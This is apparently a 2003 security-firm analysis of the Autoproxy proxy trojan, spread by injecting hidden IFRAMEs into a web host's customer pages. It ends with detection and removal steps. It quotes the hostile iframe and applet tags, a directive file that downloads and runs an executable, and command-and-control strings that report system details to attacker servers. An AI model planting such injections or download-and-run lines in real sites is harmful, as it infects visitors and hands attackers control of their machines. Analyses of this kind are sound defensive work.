Internet Explorer/Autoproxy Trojan Analysis

• URL: http://www.secureworks.com/research/threats/autoproxy
• Date: September 8, 2003
• Author: Joe Stewart

Sometime around the 28th of August 2003, a major webhosting provider's Windows-based hosting systems were compromised and hostile code was inserted into each customer's pages in an IFRAME tag. The actual tag that was added was:

<iframe src=http://wvw.beech-info2.com/_vti_con/rip.asp width=0 height=0 
frameborder=0 marginwidth=0 marginheight=0></iframe>

This loaded the following content into a 0x0 IFRAME:

<IFRAME SRC="http://selfbookmark.com/enter.cgi?id=742" WIDTH=1 HEIGHT=1></IFRAME>
<object data="http://ww.beech-info2.com/cgi-bin/inf2.pl"></object>

The selfbookmark.com IFRAME then loaded the following content:

<HTML><HEAD><script language=JavaScript>a=setInterval("window.status=' '",1)</script></HEAD><BODY onLoad="clearInterval(a)"><APPLET CODE="BlackBox.class" ARCHIVE="archived.jar" WIDTH=1 HEIGHT=1><PARAM NAME=data VALUE="lst"><PARAM NAME=time VALUE=1056204506><IFRAME SRC="/enter.cgi?ie=1&id=742" WIDTH=1 HEIGHT=1></IFRAME></APPLET></BODY></HTML>

This is a hostile java applet that is detected by anti-virus scanners as JAVA_Bytverify.A, code which takes advantage of the MS03-011 vulnerability announced on April 9, 2003. Visitors with a vulnerable Microsoft Java VM would have fallen prey to this code.

The java applet downloads a textfile from http://www.clavus.net/lst.backs that contains the following directives:

SP|www.ewebsearch.net/sp.htm
HP|www.ewebsearch.net/|no
HomeSet|ya
TYPED|ewebsearch.net
TYPED|hunteros.com
TYPED|sexhits.org
TYPED|www.ewebsearch.net
TYPED|www.hunteros.com
TYPED|www.sexhits.org
bookmark|60pictures.com/|60 pictures every hour
bookmark|sexhits.org/|Quality Adult Top 100
bookmark|sexyteenclub.com/|Sexy Teen Club
bookmark|www.ewebsearch.net/|Ultimate start page
bookmark|www.hunteros.com/|World's first adult search engine
bookmark|young-hardcore.net/|Youngest girls every day
bookmark|young69.net/?id=bm|Youngest 69 galleries
exe|http://www.clavus.net/files/lsd.exe|C:\lsd.exe
scin|http://81.9.1.51/kern.cgi|WININET.DLL|

The URL prefixed with SP would be set to the user's new search page. The "HP" url would become their home page. The "TYPED" URLs would show up in their pulldown history, and the "bookmark" URLs would be added to their bookmarks. The "exe" URL would be downloaded and executed - this may be a porn dialer or some other trojan (it was no longer there at the time of this writing). The "scin" keyword may be a typo; there is nothing in the java applet which utilizes that command.

These are obvious,low-grade browser hacks, very different from the more sophisticated trojan being installed via the object tag.

The object data tag loaded and ran a malicious Visual Basic script downloaded from beech-info2.com in the visitor's browser if they were vulnerable to the MS03-032 vulnerability announced only one week prior.

When this script ran, it extracted from its code a Windows executable file 5120 bytes in size, packed with UPX. This file is a downloader called Autoinit. Its job is to download and install a single program from a URL encrypted inside the code section. In this case, the decrypted content was:

GET /bin/ap216.exe HTTP/1.1
Host: smart2com.net

ap216.exe was downloaded and executed on all the vulnerable hosts. This file is a trojan called "Autoproxy", which gives an attacker the ability to bounce his/her TCP connections through infected hosts, disguising the true source of the connection. It also gives the hacker the ability to download other files to the victim's computer and execute system commands.

Autoproxy relies on a "master server" to retrieve commands from. The address of the master server is encrypted inside the code section. In this case, the decrypted content was:

http +smart2com.net -rRL+AHPIiu 18000000 1800000 /bn/ap.txt?\E\T\E

This is a command string for the proxy which causes it to connect to smart2com.net with the given options, and request the file /bin/ap.txt, appending the local system's date and time.

Autoproxy is more sophisticated than most proxy trojans. It has a very flexible control mechanism based on a custom protocol that runs over HTTP. It allows the hacker to have control over the timing of every function the proxy performs. For example, when the ap.txt file is requested, the master server returns the following content:

http +www.cnet.com +ABc "socks 0.0.0.0:0\; httpp 0.0.0.0:0\; http +66.98.150.9
-rRL+HAPIiub 600000 900000 /cgi-bin/post.fcgi \"locip 66.98.150.9\\\; http 
66.98.150.9 +p ap=\\\\A&id=\\\\E\\\\I\\\\E&os=\\\\E\\\\O\\\\E&country=\\\\E
\\\\c\\\\E&lang=\\\\E\\\\l\\\\E&time=\\\\E\\\\T\\\\E&locip=\\\\E\\\\L\\\\E
&bytes=\\\\B&delta=\\\\D&socks=\\\\S&httpp=\\\\H&modem=\\\\m&mouse=\\\\M
&keyboard=\\\\K\""

This instructs the Autoproxy process to get www.cnet.com via HTTP, to start up a socks proxy on a system-chosen port between 1024-5000, to start up an HTTP proxy on a system-chosen port between 1024-5000, and report system information in the specified format back to the master server.

Upon sending back the system information, the Autoproxy process would receive further commands from the master server. Possible commands include:

ADMIN
CLRLOG
ECHO
EXEC
EXIT
FLUSHLOG
HTTP
HTTPP
LOCIP
MESSAGES
RASTEST
RELAY
RESTART
SET
SETID
SOCKS
UNINSTALL
URL
WND

Autoproxy is mistakenly identified by some anti-virus engines as the IRC-based trojan "Backdoor.Coreflood". This is because the two files share a lot of common code, and are probably by the same author. Autoproxy, however, does not use IRC as a control channel, and is not designed for the purposes of denial-of-service attacks.

This is the largest example of mass-hacking to install trojans we have seen to date. It is unclear exactly how many people were affected, but it could easily surpass the number infected with Sobig.F. We believe that this method of spreading trojans will only increase in popularity with the hacking community, since when combined with a mass webserver hack it can leverage far more victims than more well-known propagation routes such as email and p2p networks. Users can no longer safely believe that since they have a firewall and they don't click on email attachments that they will not be infected with a trojan. In the case of the users affected by this trojan, they simply visited a familiar website with a week-out-of-date web browser.

How to tell if you are infected:

Open the start menu, go to "Run" and type "regedit" and click OK. Open the registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and look for the following entry:

	Winsock2 driver		EXPLORER.EXE

Also there will be one or two entries with a seven-letter random name for the key and a executable file with the same random name in the System32 directory, for example, something like:

	sbdsjrj			C:\WINNT\System32\sbdsjrj.exe

or

	xdinlte			C:\WINDOWS\System32\xdinlte.exe

It will be different each time, so there is no way to predict what the actual names will be. The key factor is that the executable name will be the keyname with .exe appended.

Manual Removal:

Warning: Do not attempt this unless you are comfortable editing your registry. Making a mistake here could cause registry corruption or failure to boot. If in doubt about which files are malicious, do not follow this procedure; instead get an anti-virus scanner and let it quarantine the files.

Open the task manager by pressing CTRL-ALT-DELETE. Find the explorer.exe process from the list and kill it. The taskbar should momentarily disappear and return. This will remove the trojans from the Explorer memory space. Then delete the registry entries you found above.